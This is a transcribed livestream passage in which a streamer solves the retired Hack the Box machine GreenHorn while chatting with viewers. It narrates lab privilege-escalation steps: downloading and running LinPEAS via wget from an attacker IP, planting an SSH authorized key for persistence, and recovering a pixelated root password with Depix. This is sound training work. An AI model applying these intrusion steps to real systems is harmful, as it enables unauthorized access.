of, like, I don't know if getting past this is part of the machine or not. I'm blurring the password. Let's pop limpies on here. Change directory temp. What hobbies do you have outside of cybersecurity? Nothing. I'll play a video game every once in a while, but I haven't played a video game for over a month now. This is what I do in my free time. This is my free time right now. And this is what I do. I make content, but it's cybersecurity content nonetheless, but I guess it's kind of like a hobby, because it's like when I'm editing a video, I'm not really using my cybersecurity skills. But recording the video, you know, I am using the cybersecurity skills to record the video, but then like editing and then editing the video and uploading it and coming with a title, coming with a thumbnail, graphic design and all that, definitely not cybersecurity skills there. Marketing skills to promote it, to get people to click on it, to watch it, to engage with it. It's like marketing skills. So that's kind of the hobby, right? The content creators, I would say, probably the harder. That's why I don't really have time for anything else. I do spend a lot of time on content creation. I would have way more technical skills if I didn't spend so much time on the content creation. But I think the content creation is important because I like people to see the journey that I took, because no one told me that this field existed until I was like 24 years old, and I wish I would have known earlier, and that's why I make content. What's up, Taha? Welcome back to the stream. How you doing today? Have you ever created a virus or worm just for fun? No. No, I'm not. I've never done that. That's actually never even crossed my mind, actually, to create a virus that like self-replicates, or a worm that self-replicates, and a virus that replicates when people send it to each other. Just never been a thing. That's illegal for one. Yeah, it's not even legal, so that's why I haven't done that. You don't want a worm to run rampant all over the internet, because you can easily go to prison if you do that. So no, I've never done that. Now you could probably, I mean, you could do that in a lab, but I haven't been excited for something like that. I enjoy doing CTFs and certifications for my challenge and my learning. I like game development at free time. Nice. That's pretty cool, actually. I would I would say like a week or two, I was watching this game development channel. I forget the channel name, but they would do like these developer challenges where they would have like pass the game to the next developer. You've probably seen it if you're in development, but they would have like someone start the project and then they would pass it to the next developer without even telling them anything, like what the game's about. They're just like, yep, I spent a day on this game, and pass it to the next developer. The next developer gets in, like, what the heck am I even looking at here? That was a good show. Good channel. I got into that, but then it got boring after I watched it for like I said, probably like a week and a half or something like that. Put limpies on the box, guys. Do change directory, tools, Python 3-m http.server 80, and then we're going to do wget http //10.10.16.32 /limpies.sh. And we're going to do a chmod plus x linps.sh, and we're going to run linps.sh. linps.sh. There we go. Look at him. Look at him. Little P. Little P. It's very easy to make a script that runs Linux systems. Ruins Linux systems. I enjoy destroying my own VMs. Oh man, that's funny. I have a feeling that deobfuscating that file is the way to go, but I don't know. Let's just check limpies and see if there's any quick wins here. It's definitely worth checking. It's still running, so we'll let that run for a second. I don't know how to... I wonder if there's a way to, like, put this in a... How to uncensor blur tool in PDF. Oh, I didn't spell censor right. This is the new CTF or hack the box? It's not the new one. This one came out last year sometime. It's decently new. But you're not allowed to stream the new ones. You have to wait for them to retire. And I think it takes, I don't know, two and a half months, maybe even 3 months for it to go from active to retired. How do I remove the censor? I spelled censor with an S because I'm slightly dumb. It's censor with a C. Does anyone know how to remove censorship from a PDF? How to remove redactions from a PDF? Would you say OSCP uses a lot of public exploits for their exams? I don't want to answer that question. I don't want to tell you what's on the exam and what's not on the exam. But let me talk about the labs, the OSCP labs. It's a good mix of both, of public and not public. For the OSCP labs. Also, Emir just reacted. Thanks for stopping in. How you doing today? Bro, I don't know what to do. Go back to limpies. Password PNG. Modify interesting files in the last 5 minutes. KBX and which I can just paste the command. I like this machine. I was liking it until I got to the Previs part. Also, Azure AD, thanks for stopping and glad to see you here. I broke the machine, dude. Oh, I shouldn't have cleared the terminal. My Limpy's output is gone now. Oops. Well, if I spelled payload.zip correct, I would have won there. Root / HTTP GreenHorn / payload.zip. Oh, I still can't spell payload right. Typo. Pi. Root / HTTP / GreenHorn / payload.zip. There we go. I just wish that didn't break my terminal. That last command that I ran. Alright, so ChatGPT is telling me to run this. GPG-list secret keys key ID format long. If I get, well, I have to spell GPG correct. This is why I like copying pasting commands, because I always typo stuff, but it won't let me copy and paste. It's just really agonizing. List dash secret keys dash dash key ID format long. Permission denied. Okay. Permission denied. Okay. So this isn't the way in, I don't think. I went back. Oh, I'm not. I'm Dodo Data. I forgot to switch user to Junior. Oops. Of course, I typed in wrong. I love you one. Oh my gosh. Switch user Junior. I love you one. Alright, now let's see if we can try that again. It'd be nice if I can paste, but it won't let me paste. And then when I do this, it freezes. Oh, this shell is so bad. Gotta redo it all. Tried to create a stable shell. I put an SSH key in there, but it wouldn't let me do it. Would save me so much time. So I gotta spend more time battling this stupid shell than I am trying to actually exploit it. The machine, you know. I think I got an idea. I think I can just maybe paste these commands into here first to get rid of this stupid thing. I don't know. This might break it again. This is all that command ChatGPT tell me to run to see if I can exploit this little key thing. Try root. Alright, let's see if this works. What is the best method to privilege escalation on reverse connect to console and machine? There's no best way to privilege this. It's like if there's all kinds of different ways to do it. There's no best ways to do it. It's like sometimes the vulnerability exists, sometimes it doesn't. Of course. I don't know why it puts those stupid characters on my paste. It's literally the worst thing ever. GPG -- list secret keys, key ID, format, long. I don't even know if I'm spending time on the right thing right now. If you're looking for a more stable shell, just upload your public key. That's what I did, but it didn't work. I got a permission denied. Watch. Okay, change directory. Change directory. So unauthorized keys here. Change directory AUTHORIZD keys. I can't go into authorized keys? That's weird to me. I was in there earlier. Now I'm not in there. I literally made authorized keys, like I made that directory. How do I not have permission? I don't think it's a directory. That's right. Oh, that's what it is. That's right. That's what I did wrong. It's not. It's supposed to be a file, not supposed to be a directory. I always mix that up. Okay. That's what I did wrong. I need to change directory here, cat I ctf idrsa dot pub. We need to put this into remove authori. Can I remove? It's a directory. Remove -rf authori. It's saying permission denied. Wow. Okay, let's try touch authorize keys. What's up, Vincent Herrera? Thanks for stopping in. Glad to see you here. How long have I been streaming? 2 hours. I'm gonna make sure I do this right. Because if I do a nano, I don't think it's gonna work. I think nano's broken. I think if I just do echo, but see, this is what drives me nuts about it. See this percent, this 200? Like, I can't paste nothing into this machine, man. It is the literal worst. And then this is what makes it even worse. Is if I can't delete to the next line. I can't delete the next line. I can't go up and down. And if I just push enter, it just, the whole terminal freezes up. This terminal. So frustrating. I hate it. I hate it. I don't think V is gonna work. I don't have a stable enough shell for V to or nano to work. And even then, I don't even like V. Like I absolutely despise that program. It's so dumb. Like, I hate how it works. I'll just transfer the file over to HTTP once I get another shell, which will be my 20th time doing this. I can't even exploit because I keep messing with this stupid shell stabilization crap. I'm starting to understand why people rated this one 2.8 stars out of 5. The machine was alright for user TXT, but escalating privileges of root is just the worst because you can't try nothing, because every time you try something it breaks the shell. Every time. Junior. Cannot write because it's a directory. I don't know how it's possible for me to be able to I'm the one who created the authorized keys directory, and I can't delete it now. Isn't that silly? Permission denied. I was inside of it earlier too. That's what's the worst about the whole thing. I think because I changed the permissions of it. I'm gonna revert to machine. I hate this machine. I don't even know what I'm supposed to do for prove this. I can't even enumerate the stupid machine. That's what's so frustrating about it. This is one of the most unstable hack-the-box machines I've seen in a long time. I just don't know why I got 2.9 stars. Could even break 3. Oops. I didn't specify the full file path. Root, hackbox, GreenHorn, payload.zip. While it's loading, do you prefer Kali or Linux? Well, I'm using Kali, so that might be a hint. I actually haven't used Parrot that much. I just never had a need to. Switch user junior. No, what am I doing? Sudo. It is I love you 1. Okay, now I can switch directory to the home, and then now I can do make directory.ssh, change directory.ssh. I should be able to do a wget http:// 10 10.16.32 slash authorized keys ls. There we go. Smod, I think it's smod 600. This is what got me in trouble last time. I gave root control over this. I think it's 600 for authorized keys and 700 for SSH, maybe? I can remember. Let me scroll. Missing operand after 6 authorized keys? This doesn't make any sense. Smod 600 authorized keys. There we go. Change directory. I think it's smod 700 for .ssh as well. Let's see if I can log in now. There we go. We're in there. Okay. This OpenBoss PDF, this has got to be it, dude. This has to be the vulnerability, but I don't know how. I don't know how to deobfuscate this, like, at all. I can't find any good articles on this. Is that the way? That's the hint that I want. Someone asked, yeah, Azure. He said I can have a hint if I want. I think it was you. I just need to know, like, is that the way forward? I just gotta deobfuscate this? We know that for sure? Well, I mean, you guys know. I don't know. That's what I'm asking. PDF is the way? That's so dumb. How do you do it? There's no article that tell you how to do this in a clean way. And everything ChatGPT told me to do, which I've already tried, didn't work. What is a root user's password? It's just like, hey, let's give it a hint. Does it tell me, check out this research from JumpSec Labs? Alright then. I wish it would open up a new tab. I don't. Every link that you click should open up a new tab, and that's my hot take. I hate when I click a link and it doesn't open up a new tab. This is the literal worst. You guys feel the same way? Like I don't want to leave this tab. I want to open up a new one. Recovers passwords from pixelized screenshots. Bro, it's a whole book on how to do this, bro. Oh my god. I'm just gonna give this to ChatGPT and I'm gonna have it tell me what to do. I don't feel like reading this right now. What do they call this article? Deepix? All right. There's no requirements.txt even in here. The target PDF is Back the Box, GreenHorn, OpenVOS. What's the S? What? Uh, Everything ChatGPT tells me to do, it's wrong. This is why, yeah, you're right. ChatGPT sucks when it comes to like helping you pen test, helping you use CTF boxes. It just simply can't do it. Saying rename this? Why? Oh, what is this? Bro, he doesn't even tell you what commands to run in this blog. Tool gen. Didn't work. Okay, let's try this. No module name. Dpix. No module name Dpix. So we can do like a pip install. Broken, dude. I don't know how to run the script. Bro, what the heck? It's telling me to download the files for this debrusion sequence. I can't run the script to make it the sequence. I do pip install dpix. This is already satisfied. I don't understand how it can say, hey, you can't import from dpics. Like, why not? This box is the worst. This professor's stupid. This is such a pain, dude. See if we can get that to work. It seemed like it worked. I am so over this box. Everything I try just it just doesn't work, man. I want to give ChatGPT one more chance to help me out here. Look at all these fonts. Jeez. Yeah, I quit. I'm gonna look up the write up here. I gotta see what they ran to get this shit to run. I gotta know like what sequence of commands is the ideal command sequence to run. I tried everything. So he's doing more of this mother. He's doing right click, save image as GreenHorn. Name image dot. Let's just do root.png so I know what I save. I think I got several images. Change directory, hack the box, GreenHorn. Where'd my write-up go? It's alright, so here's the command I gotta run. Path to image would be I don't know what I put here. Desired path? Oh, alright. I thought I had a dpix directory. Oh, it's in here. Move dpix to root, hack the box, GreenHorn. I see now. We just get rid of that. That should work. Root PNG's on a file. How's that? Is that working? Looks like something's working here. Looks like it might be working. I don't know if it's done or not. Let's just... Still working, I think. Alright, let's do LS. I think we got it. I'm gonna keep kicking it. Picks that. I want to click the... Hack the box. GreenHorn. Where's that PNG file? Password PNG. Side from side, the other side, side from side, the other side. Okay, we figured that out. What a wild password. So it's side from side, the other side, side from side, the other side. So can I just switch user root now? Switch user root. Wish I could type, dude. What the heck? I'm root. Do an ID, so let's just do cat root slash. Oh my gosh, there's a space in there. Cat slash root dot txt. There it is. Done. That was not satisfying at all. That was painful. But we're done with it. Let's go ahead and shut the machine down. Boom. And let's look at my profile. How many machines is that for now for me? It's 112. Oh, that one was a pain. It was fun until it, like, initial access was fun because it was, yeah, initial access was great, and then that privilege escalation was just toxic. Like, I don't know how I'm expected to find that one obscure article on my own. You know what I mean? Like, it wasn't documented at all. Like, the only reason why I found that article was because I clicked the hint on the guided mode. Thanks, Azure 80. Appreciate it. Alright, guys. Thank you so much for watching. Thanks for hanging out. Next stream will be on Friday, same time, 7 p.m. Eastern Time. That's 4 p.m. Pacific Time. I'm going to be doing another coding stream. We're going to be doing coding streams every Friday, and then you're going to see streams like this on Mondays where I do Hack the Box, Try Hack Me, or Portswigger Web Security Academy. Next week, I believe, is Portswigger Web Security Academy. I'm not sure which one we're going to be doing, but we'll be doing Portswigger Web Security Academy next week. I do Hack the Box once every 3 weeks. Question, please. Are Pearl Labs really as good as they say? People say they're good. I haven't done a single pro lab yet, so I don't know the answer to that. Alright guys, thanks for watching. Thanks for hanging out. I will see you on the next stream. Check out my YouTube channel if you want to see some of my videos, and check out my podcast, The Hacker's Cache. New episodes every Wednesday. Hopefully I see you there. Alright guys, you guys have a great night, and you guys stay awesome.